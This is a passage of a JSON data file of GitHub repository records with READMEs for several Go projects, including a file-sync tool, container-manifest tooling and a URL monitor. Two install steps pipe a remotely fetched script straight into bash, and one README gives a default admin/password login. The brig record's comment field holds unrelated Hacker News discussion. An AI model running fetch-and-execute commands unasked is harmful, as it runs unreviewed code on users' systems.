appreciated.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sahib/brig", "link": "https://github.com/sahib/brig", "tags": [], "stars": 540, "description": "File synchronization on top of ipfs with git like interface & web based UI", "lang": "Go", "repo_lang": "", "readme": "# `brig`: Ship your data around the world\n\n
\n\n[![go reportcard](https://goreportcard.com/badge/github.com/sahib/brig)](https://goreportcard.com/report/github.com/sahib/brig)\n[![GoDoc](https://godoc.org/github.com/sahib/brig?status.svg)](https://godoc.org/github.com/sahib/brig)\n[![Build Status](https://travis-ci.org/sahib/brig.svg?branch=master)](https://travis-ci.org/sahib/brig)\n[![Documentation](https://readthedocs.org/projects/rmlint/badge/?version=latest)](http://brig.readthedocs.io/en/latest)\n[![License: AGPL v3](https://img.shields.io/badge/License-AGPL%20v3-blue.svg)](https://www.gnu.org/licenses/agpl-3.0)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/1558/badge)](https://bestpractices.coreinfrastructure.org/en/projects/1558)\n\n![brig gateway in the files tab](docs/_static/gateway-files.png)\n\n## Table of Contents\n\n- [`brig`: Ship your data around the world](#brig-ship-your-data-around-the-world)\n - [Table of Contents](#table-of-contents)\n - [About](#about)\n - [Installation](#installation)\n - [Getting started](#getting-started)\n - [Status](#status)\n - [Documentation](#documentation)\n - [Donations](#donations)\n - [Focus](#focus)\n\n## About\n\n`brig` is a distributed & secure file synchronization tool with version control.\nIt is based on `IPFS`, written in Go and will feel familiar to `git` users.\n\n**Key feature highlights:**\n\n* Encryption of data in rest and transport + compression on the fly.\n* Simplified `git` version control.\n* Sync algorithm that can handle moved files and empty directories and files.\n* Your data does not need to be stored on the device you are currently using.\n* FUSE filesystem that feels like a normal (sync) folder.\n* No central server at all. Still, central architectures can be build with `brig`.\n* Simple user identification and discovery with users that look like email addresses.\n\nAlso take a look [at the documentation](http://brig.readthedocs.io/en/latest/index.html) for more details.\n\n## Installation\n\nYou can download the latest script with the following oneliner:\n\n```bash\n# Before you execute this, ask yourself if you trust me.\n$ bash <(curl -s https://raw.githubusercontent.com/sahib/brig/master/scripts/install.sh)\n```\n\nAlternatively, you can simply grab the latest binary from the [release tab](https://github.com/sahib/brig/releases).\n\nDevelopment versions can be installed easily by compiling yourself. If you have\na recent version of `go` (`>= 1.10`) installed, it should be as easy as this:\n\n```bash\n$ go get -d -v -u github.com/sahib/brig # Download the sources.\n$ cd $GOPATH/src/github.com/sahib/brig # Go to the source directory.\n$ git checkout develop # Checkout the develop branch.\n$ go run mage.go # Build the software.\n$ $GOPATH/bin/brig help # Run the binary.\n```\n\nPlease refer to the [install docs](https://brig.readthedocs.io/en/latest/installation.html) for more details.\n\n## Getting started\n\n[![asciicast](https://asciinema.org/a/163713.png)](https://asciinema.org/a/163713)\n\n...If you want to know, what to do after you can read the\n[Quickstart](http://brig.readthedocs.io/en/latest/quickstart.html).\n\nThere is also a ``#brig`` room on ``matrix.org`` you can join with any [Matrix](https://matrix.org) client.\nClick [this link](https://riot.im/app/#/room/#brig:matrix.org) to join the room directly via [Riot.im](https://about.riot.im).\n\n## Status\n\nThis software is in a **beta phase** currently. All mentioned features should\nwork. 
Things might still change rapidly and there will be no guarantees given\nbefore version `1.0.0`. Do not use `brig` yet as only storage for your\nproduction data. There are still bugs, but it should be safe enough to toy\naround with it quite a bit.\n\nThis project has started end of 2015 and has seen many conceptual changes in\nthe meantime. It started out as research project. After writing my [master\ntheses](https://github.com/disorganizer/brig-thesis) on it, it was put down for\na few months until I picked at up again and currently am trying to push it to\nusable software.\n\nIf you want to open a bug report, just type `brig bug` to get a readily filled template for you.\n\n## Documentation\n\nAll documentation can be found on [ReadTheDocs.org](http://brig.readthedocs.io/en/latest/index.html).\n\n## Donations\n\nIf you're interested in the development and would think about supporting me\nfinancially, then please [contact me!](mailto:sahib@online.de) If you'd like to\ngive me a small & steady donation, you can always use *Liberapay*:\n\n\n\n*Thank you!*\n", "readme_type": "markdown", "hn_comments": "The title might be overblown but I've come to fully expect every government agency is somehow influenced (to say the least) by some organization or another with an ulterior motive.It appears this is just the way the system is set up. Everyone has something to gain from this influence (except the public of course). I've come to accept this as a fact of life and think for myself. Do my own research, consult professionals in matters that are important to me.This is one of the reasons why I look at nutritional and medicinal guidelines recommended by other countries outside the US.This is common complaint at science conferences. Research dollars often go towards shiny things instead of knowledge that will advance diagnostic theory and serve the highest good. Without accurate theory, we cannot advance. The Mediterranean diet is a classic example. Once the researchers were able to show it had some health benefits, it received huge amounts of funding for years. They were able to publish again and again, gaining publicity, gaining more funding and giving the illusion of superiority over other, less-researched, dietary and nutritional tools. Imagine if they had sought to understand how it actually works? We need to ensure that research dollars go towards meaningful projects that seek truth, maintain objectivity and advance knowledge, not agendas.This has to have implications on why no two studies are ever quite the same, and rarely reproducible. Yet another \"study\": https://pubmed.ncbi.nlm.nih.gov/26980822/This is entirely shocking to me and definitely doesn't just promote a sigh, an eyeroll, and a disturbingly-existential internal observation on the futility of getting anything non-money-related done in good faith when money is involved.The Academy of Nutrition and Dietetics is a lobbying group, why would this be surprising to anyone? They have no official government function.Edit: It appears I am wrong, and it is not just a lobbying group. They also issue the licensing needed to sell diet advice in many states.https://www.cdrnet.org/#The Academy and nutrition and dietetics depend on dietitians renewing their Registered Dietitian credential. 
That's how they make money.In order to force the issue, the AND's lobbyists have gone around the country and made it so that you are required to have a license in 14 states to talk with another individual about food and nutrition.The AND made it so that in order to get that license you must be a registered dietitian, in other words, you must pay a private organization for the privilege to pay the government for a license to talk about food and nutrition.It's a classic government back monopoly that has no positive impact on society, other than protectionism of an outdated business model.https://ij.org/client/heather-kokesch-del-castillo/How is this group \"shaping US nutrition\". Thats quite a claim.If you lookup the histories of the people making the decisions you\u2019ll see their connections to industry.The chair of the committee who oversees dietary recommendations is listed as a professor. She got that for filling for retirement as a professor more than a decade ago. Has worked in industry lobbying and funding industry studies prior to gov work. Not an impartial person.Edit: her LinkedIn is https://www.linkedin.com/in/barbara-schneeman-ph-d-a99b6829. The Damon institute funds stuff for the yogurt companyI thought this had been common knowledge for years.Selling hardware, selling ads, selling entertainment. And the first category is shrinking in value. How many bloody ads do people need?It looks like Apple generated more revenue from wearables (AirPods and Apple Watch) than what it generated from selling Macs.Does net income include or exclude operational expenses (like engineeer salary)? If it excludes it, it\u2019s pretty crazy that the net income is almost 25-30% their total revenue.Big Ideas From His Last 3,000 TweetsCNN and older HN news link:\nhttps://news.ycombinator.com/item?id=20708185https://techcrunch.com/2019/01/06/apple-is-bring-itunes-cont...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "plutov/practice-go", "link": "https://github.com/plutov/practice-go", "tags": ["go", "golang", "hacktoberfest"], "stars": 540, "description": "Practice Go: a collection of Go programming challenges", "lang": "Go", "repo_lang": "", "readme": "## Go coding exercises and elegant solutions [![Build Status](https://travis-ci.org/plutov/practice-go.svg?branch=master)](https://travis-ci.org/plutov/practice-go)\n\n### How to solve\n\n - Each folder has a README.md file and `*_test.go` file, check it and find what kind of function you need to implement.\n - You may use anything you want except 3rd-party packages.\n - Implement the function.\n - Run tests and benchmarks.\n - Create a PR to `master` branch and answer questions from PR template.\n - We will choose the most fast and elegant solution and merge into the repo within 7 days.\n\n### Challenges\n\n - [x] ([@macocha](https://github.com/macocha)) [chess](https://github.com/plutov/practice-go/tree/master/chess)\n - [x] ([@kennygrant](https://github.com/kennygrant)) [floyd](https://github.com/plutov/practice-go/tree/master/floyd)\n - [x] ([@ledongthuc](https://github.com/ledongthuc)) [anagram](https://github.com/plutov/practice-go/tree/master/anagram)\n - [x] ([@heliac2000](https://github.com/heliac2000)) [jaro](https://github.com/plutov/practice-go/tree/master/jaro)\n - [x] ([@nguyengiabk](https://github.com/nguyengiabk)) [mergesort](https://github.com/plutov/practice-go/tree/master/mergesort)\n - [x] ([@nguyengiabk](https://github.com/nguyengiabk)) 
[wordladder](https://github.com/plutov/practice-go/tree/master/wordladder)\n - [x] ([@EvenPeng](https://github.com/EvenPeng)) [sumdecimal](https://github.com/plutov/practice-go/tree/master/sumdecimal)\n - [x] ([@bediger4000](https://github.com/bediger4000)) [buildword](https://github.com/plutov/practice-go/tree/master/buildword)\n - [x] ([@zerkms](https://github.com/zerkms)) [shorthash](https://github.com/plutov/practice-go/tree/master/shorthash)\n - [x] ([@zerkms](https://github.com/zerkms)) [romannumerals](https://github.com/plutov/practice-go/tree/master/romannumerals)\n - [x] ([@zerkms](https://github.com/zerkms)) [lastlettergame](https://github.com/plutov/practice-go/tree/master/lastlettergame)\n - [x] ([@duckbrain](https://github.com/duckbrain)) [reverseparentheses](https://github.com/plutov/practice-go/tree/master/reverseparentheses)\n - [x] ([@kennygrant](https://github.com/kennygrant)) [functionfrequency](https://github.com/plutov/practice-go/tree/master/functionfrequency)\n - [x] ([@marz619](https://github.com/marz619)) [coins](https://github.com/plutov/practice-go/tree/master/coins)\n - [x] ([@marz619](https://github.com/marz619)) [secretmessage](https://github.com/plutov/practice-go/tree/master/secretmessage)\n - [x] ([@shogg](https://github.com/shogg)) [missingnumbers](https://github.com/plutov/practice-go/tree/master/missingnumbers)\n - [x] ([@HDudzus](https://github.com/HDudzus)) [spiral](https://github.com/plutov/practice-go/tree/master/spiral)\n - [x] ([@TomLefley](https://github.com/TomLefley)) [warriors](https://github.com/plutov/practice-go/tree/master/warriors)\n - [x] ([@shogg](https://github.com/shogg)) [snowflakes](https://github.com/plutov/practice-go/tree/master/snowflakes)\n - [x] ([@shogg](https://github.com/shogg)) [brokennode](https://github.com/plutov/practice-go/tree/master/brokennode)\n - [x] ([@shogg](https://github.com/shogg)) [nasacollage](https://github.com/plutov/practice-go/tree/master/nasacollage)\n- [x] ([@shogg](https://github.com/shogg)) [node_degree](https://github.com/plutov/practice-go/tree/master/node_degree)\n\n### Run tests with benchmarks\n\nRun it in the challenge folder:\n\n```\ngo test -bench .\n```\n\n### How to create new challenge from template\n\n```\n./new.sh challenge_name\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "estesp/manifest-tool", "link": "https://github.com/estesp/manifest-tool", "tags": ["docker", "docker-registry", "docker-image", "docker-images", "multiplatform", "multiarch", "oci-image", "container-registry", "container-image", "container-images", "oci-distribution"], "stars": 540, "description": "Command line tool to create and query container image manifest list/indexes", "lang": "Go", "repo_lang": "", "readme": "## manifest-tool\n\n`manifest-tool` is a command line utility used to view or push multi-platform container image\nreferences located in an OCIv1 or Docker v2.2 compatible container registry.\n\nWhile several other tools include more complete capabilities to view and manipulate the\n*manifest* objects associated with container images and artifacts, `manifest-tool` was created\nas one of the first command line tools capable of assembling \"manifest lists\" (Docker v2.2), now\nmore commonly known as \"indexes\" in the OCIv1 image specification. 
[**Manifest lists**](https://github.com/distribution/distribution/blob/main/docs/spec/manifest-v2-2.md#manifest-list) or\n[**indexes**](https://github.com/opencontainers/image-spec/blob/main/image-index.md) exist for\nthe purpose of combining an array of architecture and platform specific container image manifests\nunder a single reference. This allows a container runtime to select the appropriate index\nentry that matches the local node's architecture and platform. Before these kinds of manifests\nwere available it required separate instructions, configurations, or code changes to set\nup the appropriate platform-specific image reference depending on the platform in use.\n\n### Installation\n\nThe releases of `manifest-tool` are built using the latest Go version, and binaries for many\narchitectures are available as pre-built binaries with each release, found on the\n[GitHub releases](https://github.com/estesp/manifest-tool/releases) page.\n\nYou can also use `manifest-tool` via an existing Docker image automatically generated for a\nlarge number of architectures with each release. To use this image simply run\n```sh\n$ docker run mplatform/manifest-tool\n```\n\nTo build `manifest-tool` locally, clone this repository and build the binary as shown below.\nNote that you will need to have a recent version of the Go SDK installed on your system as well\nas `make`.\n\n```sh\n$ git clone https://github.com/estesp/manifest-tool\n$ cd manifest-tool && make binary\n```\n\nIf you don't want to install a local development environment but have Docker installed, you\ncan use `make build` to build `manifest-tool` inside the official Go SDK container.\n\nAdditional targets `make static` target will build a statically-linked binary,\nand `make cross` will build a binary for all supported platforms using Go's cross-compilation\ncapabilities.\n\n### Querying Manifests Without Installation\n\nIf you only have a requirement to query public image references to validate\nplatform support you can use a related project, [mquery](https://github.com/estesp/mquery),\nwhich allows remote querying of public registry images.\n\nUse `mquery` by running it's DockerHub-located image, **mplatform/mquery:latest**, and\nspecifying a target image to query, as shown in the example below:\n\n```sh\n$ docker run --rm mplatform/mquery mplatform/mquery:latest\nImage: mplatform/mquery:latest (digest: sha256:d0989420b6f0d2b929fd9355f15c767f62d0e9a72cdf999d1eb16e6073782c71)\n * Manifest List: Yes (Image type: application/vnd.docker.distribution.manifest.list.v2+json)\n * Supported platforms:\n - linux/ppc64le\n - linux/amd64\n - linux/386\n - linux/s390x\n - linux/riscv64\n - linux/arm64/v8\n - linux/arm/v7\n - linux/arm/v6\n - windows/amd64:10.0.17763.2300\n - windows/amd64:10.0.14393.4770\n```\n\nThe `mquery` program itself is a small Go program running as an AWS\nLambda function using a small cache so recent image results are cached.\nMore information is available in the [mquery GitHub repo](https://github.com/estesp/mquery).\n\nOutdated, but original, details on the creation of mquery are found in\n[my blog post from the Moby Summit EU 2017](https://integratedcode.us/2017/11/21/moby-summit-serverless-openwhisk-multi-arch/)\non this topic.\n\n### Sample Usage\n\n`manifest-tool` can:\n - **inspect** manifests (of all media types) within any registry supporting the OCI distribution API\n - **push** manifest list/index objects to any registry which supports the OCI distribution API and the appropriate image (Docker or OCI) image 
specification.\n\n> *Note:* For pushing you will have to provide your registry credentials via either a) the command line, b) use a credential helper application (`manifest-tool` supports these in the same way Docker client does), or c) already\nbe logged in to a registry and have an existing Docker client configuration file with credentials.\n\n#### Inspect\n\nInspect/view the manifest of any image reference (*repo/image:tag* combination)\nwith the **inspect** command. You must provide a tag, even if the tag is `latest` as\nthe containerd resolver does not auto-append latest to image references and `manifest-tool`\nutilizes the containerd resolver library.\n\nExample output of an `inspect` on a manifest list media type is shown below:\n\n```sh\n$ $ manifest-tool inspect golang:1.17\nName: golang:1.17 (Type: application/vnd.docker.distribution.manifest.list.v2+json)\nDigest: sha256:1a35cc2c5338409227c7293add327ebe42e1ee5465049f6c57c829588e3f8a39\n * Contains 10 manifest references:\n[1] Type: application/vnd.docker.distribution.manifest.v2+json\n[1] Digest: sha256:a6c0b3e8b7d2faed2415448f20e75ed26eed6fdb1d261873ed4205907d92c674\n[1] Length: 1796\n[1] Platform:\n[1] - OS: linux\n[1] - Arch: amd64\n[1] # Layers: 7\n layer 01: digest = sha256:0c6b8ff8c37e92eb1ca65ed8917e818927d5bf318b6f18896049b5d9afc28343\n layer 02: digest = sha256:412caad352a3ecbb29c080379407ae0761e7b9b454f7239cbfd1d1da25e06b29\n layer 03: digest = sha256:e6d3e61f7a504fa66d7275123969e9917570188650eb84b2280a726b996040f6\n layer 04: digest = sha256:461bb1d8c517c7f9fc0f1df66c9dc34c85a23421c1e1c540b2e28cbb258e75f5\n layer 05: digest = sha256:9297634c9537024497f76a2e1b374d8a315baa21d45bf36dc7980dc42ab93b0b\n layer 06: digest = sha256:c9cefb9872505d3a6fdcbbdbe4103393da3e384443c5a8cdd62bc368927ea1cc\n layer 07: digest = sha256:8560fc463426dc7e494720250efec25cdae1c4bf796c1a0172f791c0c7dde1c6\n\n... 
skipping 8 manifest entries\n\n[10] Type: application/vnd.docker.distribution.manifest.v2+json\n[10] Digest: sha256:78af34429b7d75d61890746d39e27beb447970bad6803ed11ab4be920dbbd061\n[10] Length: 3401\n[10] Platform:\n[10] - OS: windows\n[10] - OS Vers: 10.0.17763.2565\n[10] - Arch: amd64\n[10] # Layers: 13\n layer 01: digest = sha256:4612f6d0b889cad0ed0292fae3a0b0c8a9e49aff6dea8eb049b2386d9b07986f\n layer 02: digest = sha256:1bd78008c728d8f9e56dc2093e6eb55f0f0b1aa96e5d0c7ccc830c5f60876cdf\n layer 03: digest = sha256:f0c1566a9285d9465334dc923e9d6fd93a51b3ef6cb8497efcacbcf64e3b93fc\n layer 04: digest = sha256:1b56caecef9c44ed58d2621ffb6f87f797b532c81f1271d9c339222462523eb2\n layer 05: digest = sha256:5a3ed0a076d58c949f5debdbc3616b6ccd008426c62635ab387836344123e2a6\n layer 06: digest = sha256:f25f9584c1aa90dae36704d6bef0e59e72002fcb13e8a4618f64c9b13479c0df\n layer 07: digest = sha256:12d4fbc7cf0f85fc63860f052f76bfb4429eca8b878abce79a25bfdc30f9e9f5\n layer 08: digest = sha256:c325dc9f1660ea537aae55b89be63d336762d5a3a02e929d52940586fb0f677e\n layer 09: digest = sha256:dd4f3aabaa2a9bf80e2a7f417dba559f6b34e640c21b138dce099328406c8903\n layer 10: digest = sha256:57e61367d26baed9e16a8d5310c520ae3429d5cc7956569f325cd9de01f33604\n layer 11: digest = sha256:98eb9abc560e8d857685b3b0131c733bdbb5f3c79e93fe7e9163e443736c2f51\n layer 12: digest = sha256:fffb0b96d90540c5fe04bec7c3803e767fc06c03da00c569b92ec1abeb2db503\n layer 13: digest = sha256:e6c16363a908ee64151cd232d466b723e3edac978f1c7693db3dcbed09694d76\n```\n\nWhile we can query non-manifest lists/indexes as well, this entry is clearly\na manifest list (see the media type) with many platforms supported. To read how\ncontainer engines like Docker use this information to determine what image/layers\nto pull read this early [blog post on multi-platform support in Docker](https://integratedcode.us/2016/04/22/a-step-towards-multi-platform-docker-images/).\n\n#### Create/Push\n\nYou can create manifest list or index entries in a registry by using the **push**\ncommand with either a YAML file describing the images to assemble or by using\na series of command line parameters.\n\nA sample YAML file is shown below. As long as the target registry supports the\ncross-repository push feature the source and target image names can differ as\nlong as they are within the same registry host. For example, a source image could\nbe named `myprivreg:5000/someimage_arm64:latest` and\nreferenced by a manifest list in repository `myprivreg:5000/someimage:latest`.\n\nGiven a private registry running on port 5000, here is a sample YAML file input\nto `manifest-tool` to create a manifest list combining an 64-bit ARMv8 image and\nan amd64 image:\n\n```yaml\nimage: myprivreg:5000/someimage:latest\nmanifests:\n -\n image: myprivreg:5000/someimage:arm64\n platform:\n architecture: arm64\n os: linux\n -\n image: myprivreg:5000/someimage:amd64\n platform:\n architecture: amd64\n os: linux\n```\n\n> Note: Of course these component images must have been built and pushed to\n> your target registry before running `manifest-tool`. 
The job of `manifest-tool` is\n> simply to create the manifest which assembles existing images under a combined\n> image reference pointing to a manifest list or OCI index.\n\nGiven this example YAML input you can push this manifest list as follows:\n\n```sh\n$ manifest-tool push from-spec someimage.yaml\n```\n\n`manifest-tool` can also use command line arguments with a templating model to\nspecify the architecture/platform list and the from and to image formats as\nshown below:\n\n```sh\n$ manifest-tool push from-args \\\n --platforms linux/amd64,linux/s390x,linux/arm64 \\\n --template foo/bar-ARCH:v1 \\\n --target foo/bar:v1\n```\n\nSpecifically:\n - `--platforms` specifies which platforms you want to push for in the form OS/ARCH,OS/ARCH,...\n - `--template` specifies the image repo:tag source for inputs by replacing the placeholders `OS`, `ARCH` and `VARIANT` with the inputs from `--platforms`.\n - `--target` specifies the target image repo:tag that will be the manifest list entry in the registry.\n\nWhen using the optional `VARIANT` placeholder, it is ignored when a `platform` does not have a variant.\n\n```sh\n$ manifest-tool push from-args \\\n --platforms linux/amd64,linux/arm/v5,linux/arm/v7 \\\n --template foo/bar-ARCHVARIANT:v1 \\\n --target foo/bar:v1\n```\n\nFor the above example, `linux/amd64` when applied to the template will\nlook for an image named `foo/bar-amd64:v1`, while the platform entry `linux/arm/v5`\nwill resolve to an image reference: `foo/bar-armv5:v1`.\n\n### Known Supporting Registries\n\nAll major public cloud registries have added Docker v2.2 manifest list support\nover the years since the \"fat manifest\"-enabled specification came out in 2016.\n\nMost registries also support the formalization of that via the \"index\" manifest\ntype in the OCIv1 image format specification published in 2017.\n\nIf you find a registry provider for which `manifest-tool` does not work properly\nplease open an issue in the GitHub issues for this project.\n\n### Test Index/Manifest List Support\n\nIf you operate or use a registry claiming conformance to Docker v2.2 spec and API\nor the OCIv1 image spec and distribution spec and want to confirm manifest list/index\nsupport please use the pre-configured test script available in this repository.\n\nSee the [test-registry.sh script](https://github.com/estesp/manifest-tool/blob/main/integration/test-registry.sh) in this repo's **integration** directory\nfor further details. A simple example is shown here:\n\n```sh\n$ ./test-registry.sh r.myprivreg.com/somerepo\n```\n\n### History\n\nThis `manifest-tool` codebase was initially a joint project with [Harshal Patil](https://github.com/harche) from IBM Bangalore, and originally forked from the registry client codebase, skopeo, created by [Antonio Murdaca/runc0m](https://github.com/runcom), that later became a part of [Project Atomic](https://github.com/projectatomic/skopeo). Skopeo then\nbecame part of the overall Red Hat container client tooling later in its lifetime where it still resides today in the\n[GitHub containers organization](https://github.com/containers). The **v2** rewrite of `manifest-tool` removed all\nthe original vestiges of skopeo's original registry client and manifest parsing code, but is still part of the **v1**\nreleases of `manifest-tool` and codebase.\n\nThanks to both Antonio and Harshal for their initial work that made this possible! 
Also, thanks to Christy Perez from IBM Systems for her hard work in bringing the functionality of `manifest-tool` to the Docker client via [a docker/cli PR](https://github.com/docker/cli/pull/138). In early 2018 this PR formed the basis of a new `docker manifest` command\nwhich comprised most of the original code of `manifest-tool` and made multi-platform image creation available to\nusers of the Docker client.\n\n### License\n\n`manifest-tool` is licensed under the Apache Software License (ASL) 2.0\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "fergusstrange/embedded-postgres", "link": "https://github.com/fergusstrange/embedded-postgres", "tags": [], "stars": 540, "description": "Run a real Postgres database locally on Linux, OSX or Windows as part of another Go application or test", "lang": "Go", "repo_lang": "", "readme": "

\n[embedded-postgres logo and badges: Godoc, Coverage Status, Build, Go]\n

\n\n# embedded-postgres\n\nRun a real Postgres database locally on Linux, OSX or Windows as part of another Go application or test.\n\nWhen testing this provides a higher level of confidence than using any in memory alternative. It also requires no other\nexternal dependencies outside of the Go build ecosystem.\n\nHeavily inspired by Java projects [zonkyio/embedded-postgres](https://github.com/zonkyio/embedded-postgres)\nand [opentable/otj-pg-embedded](https://github.com/opentable/otj-pg-embedded) and reliant on the great work being done\nby [zonkyio/embedded-postgres-binaries](https://github.com/zonkyio/embedded-postgres-binaries) in order to fetch\nprecompiled binaries\nfrom [Maven](https://mvnrepository.com/artifact/io.zonky.test.postgres/embedded-postgres-binaries-bom).\n\n## Installation\n\nembedded-postgres uses Go modules and as such can be referenced by release version for use as a library. Use the\nfollowing to add the latest release to your project.\n\n```bash\ngo get -u github.com/fergusstrange/embedded-postgres\n``` \n\n## How to use\n\nThis library aims to require as little configuration as possible, favouring overridable defaults\n\n| Configuration | Default Value |\n|---------------------|-------------------------------------------------|\n| Username | postgres |\n| Password | postgres |\n| Database | postgres |\n| Version | 12.1.0 |\n| RuntimePath | $USER_HOME/.embedded-postgres-go/extracted |\n| DataPath | $USER_HOME/.embedded-postgres-go/extracted/data |\n| BinariesPath | $USER_HOME/.embedded-postgres-go/extracted |\n| BinaryRepositoryURL | https://repo1.maven.org/maven2 |\n| Port | 5432 |\n| StartTimeout | 15 Seconds |\n\nThe *RuntimePath* directory is erased and recreated at each `Start()` and therefore not suitable for persistent data.\n\nIf a persistent data location is required, set *DataPath* to a directory outside *RuntimePath*.\n\nIf the *RuntimePath* directory is empty or already initialized but with an incompatible postgres version, it will be\nremoved and Postgres reinitialized.\n\nPostgres binaries will be downloaded and placed in *BinaryPath* if `BinaryPath/bin` doesn't exist.\n*BinaryRepositoryURL* parameter allow overriding maven repository url for Postgres binaries.\nIf the directory does exist, whatever binary version is placed there will be used (no version check\nis done). 
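\nFor a quick look at what has been downloaded and extracted, you can list the default locations from the table above (a minimal sketch; the paths assume the default configuration):\n\n```bash\nls ~/.embedded-postgres-go/extracted      # default RuntimePath / BinariesPath\nls ~/.embedded-postgres-go/extracted/bin  # extracted Postgres binaries\n```\n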
\nIf your test need to run multiple different versions of Postgres for different tests, make sure\n*BinaryPath* is a subdirectory of *RuntimePath*.\n\nA single Postgres instance can be created, started and stopped as follows\n\n```go\npostgres := embeddedpostgres.NewDatabase()\nerr := postgres.Start()\n\n// Do test logic\n\nerr := postgres.Stop()\n```\n\nor created with custom configuration\n\n```go\nlogger := &bytes.Buffer{}\npostgres := NewDatabase(DefaultConfig().\nUsername(\"beer\").\nPassword(\"wine\").\nDatabase(\"gin\").\nVersion(V12).\nRuntimePath(\"/tmp\").\nBinaryRepositoryURL(\"https://repo.local/central.proxy\").\t\nPort(9876).\nStartTimeout(45 * time.Second).\nLogger(logger))\nerr := postgres.Start()\n\n// Do test logic\n\nerr := postgres.Stop()\n```\n\nIt should be noted that if `postgres.Stop()` is not called then the child Postgres process will not be released and the\ncaller will block.\n\n## Examples\n\nThere are a number of realistic representations of how to use this library\nin [examples](https://github.com/fergusstrange/embedded-postgres/tree/master/examples).\n\n## Credits\n\n- [Gopherize Me](https://gopherize.me) Thanks for the awesome logo template.\n- [zonkyio/embedded-postgres-binaries](https://github.com/zonkyio/embedded-postgres-binaries) Without which the\n precompiled Postgres binaries would not exist for this to work.\n\n## Contributing\n\nView the [contributing guide](CONTRIBUTING.md).\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "710leo/urlooker", "link": "https://github.com/710leo/urlooker", "tags": ["open-falcon", "url-monitor", "devops", "api-monitor", "api", "website-monitor", "statsd", "prometheus", "nightingale", "monitoring"], "stars": 540, "description": "enterprise-level websites monitoring system", "lang": "Go", "repo_lang": "", "readme": "## [urlooker](https://github.com/710leo/urlooker)\n\u76d1\u63a7web\u670d\u52a1\u53ef\u7528\u6027\u53ca\u8bbf\u95ee\u8d28\u91cf\uff0c\u91c7\u7528go\u8bed\u8a00\u7f16\u5199\uff0c\u6613\u4e8e\u5b89\u88c5\u548c\u4e8c\u6b21\u5f00\u53d1 \n[English](https://github.com/710leo/urlooker)|[\u4e2d\u6587](https://github.com/710leo/urlooker/blob/master/readme_zh.md)\n\n## Feature\n- \u8fd4\u56de\u72b6\u6001\u7801\u68c0\u6d4b\n- \u9875\u9762\u54cd\u5e94\u65f6\u95f4\u68c0\u6d4b\n- \u9875\u9762\u5173\u952e\u8bcd\u5339\u914d\u68c0\u6d4b\n- \u81ea\u5b9a\u4e49Header\n- GET\u3001POST\u3001PUT\u8bbf\u95ee\n- \u81ea\u5b9a\u4e49POST BODY\n- \u68c0\u6d4b\u7ed3\u679c\u652f\u6301\u63a8\u9001 nightingale\u3001open-falcon\n\n## Architecture\n![Architecture](img/urlooker_arch.png)\n\n## ScreenShot\n\n![ScreenShot](img/urlooker1.png)\n![ScreenShot](img/urlooker2.png)\n\n\n## \u5e38\u89c1\u95ee\u9898\n- [wiki\u624b\u518c](https://github.com/710leo/urlooker/wiki)\n- [\u5e38\u89c1\u95ee\u9898](https://github.com/710leo/urlooker/wiki/FAQ)\n- \u521d\u59cb\u7528\u6237\u540d\u5bc6\u7801\uff1aadmin/password\n\n## Install\n#### docker \u5b89\u88c5\n\n```bash\ngit clone https://github.com/710leo/urlooker.git\ncd urlooker\ndocker build .\ndocker volume create urlooker-vol\ndocker run -p 1984:1984 -d --name urlooker --mount source=urlooker-vol,target=/var/lib/mysql --restart=always [CONTAINER ID]\n```\n\n#### \u6e90\u7801\u5b89\u88c5\n\n```bash\n# \u5b89\u88c5mysql\nyum install -y mysql-server\nwget https://raw.githubusercontent.com/710leo/urlooker/master/sql/schema.sql\nmysql -h 127.0.0.1 -u root -p < schema.sql\n\n# \u5b89\u88c5\u7ec4\u4ef6\ncurl 
https://raw.githubusercontent.com/710leo/urlooker/master/install.sh|bash\ncd $GOPATH/src/github.com/710leo/urlooker\n\n# \u5c06[mysql root password]\u66ff\u6362\u4e3amysql root \u6570\u636e\u5e93\u5bc6\u7801\nsed -i 's/urlooker.pass/[mysql root password]/g' configs/web.yml\n\n./control start all\n```\n\n\u6253\u5f00\u6d4f\u89c8\u5668\u8bbf\u95ee http://127.0.0.1:1984 \u5373\u53ef\n\n## \u7b54\u7591\nQQ\u7fa4\uff1a556988374\n\n## Thanks\n\u4e00\u4e9b\u529f\u80fd\u53c2\u8003\u4e86open-falcon\uff0c\u611f\u8c22 [UlricQin](http://ulricqin.com) & [laiwei](https://github.com/laiwei)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "apache/servicecomb-kie", "link": "https://github.com/apache/servicecomb-kie", "tags": ["servicecomb"], "stars": 540, "description": "Apache ServiceComb MetaConfig", "lang": "Go", "repo_lang": "", "readme": "# Apache-ServiceComb-Kie \n\n[![Build Status](https://travis-ci.org/apache/servicecomb-kie.svg?branch=master)](https://travis-ci.org/apache/servicecomb-kie?branch=master) \n[![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html)\n[![Coverage Status](https://coveralls.io/repos/github/apache/servicecomb-kie/badge.svg?branch=master)](https://coveralls.io/github/apache/servicecomb-kie?branch=master)\nA service for configuration management in distributed system.\n\n## Conceptions\n\n### Key\nKey could indicate a configuration like \"timeout\",\nthen the value could be \"3s\"\nor indicates a file name \"app.properties\", \nthen the value could be content of app.properties\n\n### Labels\nEach key could has labels. labels indicates a unique key.\nA key \"log_level\" with labels \"env=production\" \nmay saves the value \"INFO\" for all application log level in production environment.\nA key \"log_level\" with labels \"env=production, component=payment\" \nmay saves the value \"DEBUG\" for payment service in production environment.\n\nIt means all payment service print debug log, but for other service print info log.\n\nSo you can control your application runtime behaviors \nby setting different labels to a key.\n\n\n## Why use kie\nkie is a highly flexible config server. Nowadays, an operation team is facing different \"x-centralized\" system.\nFor example a classic application-centralized system. A operator wants to change config based on application name and version, then the label could be \"app,version\" for locating a app's configurations.\nMeanwhile some teams manage app in a data center, each application instance will be deployed in a VM machine. 
